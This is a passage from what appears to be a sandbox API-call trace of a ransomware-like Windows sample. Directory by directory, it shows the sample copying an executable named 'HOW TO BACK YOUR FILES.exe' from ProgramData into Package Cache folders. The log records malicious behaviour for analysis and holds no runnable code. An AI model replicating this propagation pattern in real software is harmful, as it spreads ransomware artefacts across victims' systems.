nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.445] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.445] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.445] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0090.445] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0090.445] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.445] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.446] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.446] GetLastError () returned 0x0 [0090.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.446] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.446] CloseHandle (hObject=0x120) returned 1 [0090.446] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.446] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5cbe6d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5cbe6d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.446] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.447] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.447] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0090.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0090.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.447] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.448] GetLastError () returned 0x0 [0090.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.448] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.448] CloseHandle (hObject=0x120) returned 1 [0090.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.448] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.448] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.448] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0090.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0090.448] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.448] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.449] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.449] GetLastError () returned 0x0 [0090.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.449] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.449] CloseHandle (hObject=0x120) returned 1 [0090.450] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.450] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.450] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.450] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.450] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0090.450] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0090.450] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.450] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.451] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.451] GetLastError () returned 0x0 [0090.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.451] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.451] CloseHandle (hObject=0x120) returned 1 [0090.451] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.451] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5d0cfa60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d0cfa60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.451] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.452] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0090.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0090.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.452] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.453] GetLastError () returned 0x0 [0090.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.453] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.453] CloseHandle (hObject=0x120) returned 1 [0090.453] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.453] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bcd63c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bcd63c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.453] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.453] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.453] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0090.453] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0090.453] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.453] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.454] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.454] GetLastError () returned 0x0 [0090.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.454] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.454] CloseHandle (hObject=0x120) returned 1 [0090.454] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.455] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.455] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.455] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.455] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0090.455] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0090.455] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.455] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.456] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.456] GetLastError () returned 0x0 [0090.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.456] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.456] CloseHandle (hObject=0x120) returned 1 [0090.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.456] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5dc1e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dc1e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0090.457] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0090.457] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.457] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.457] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.458] GetLastError () returned 0x0 [0090.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.458] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.458] CloseHandle (hObject=0x120) returned 1 [0090.458] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.458] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5dcb6860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dcb6860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 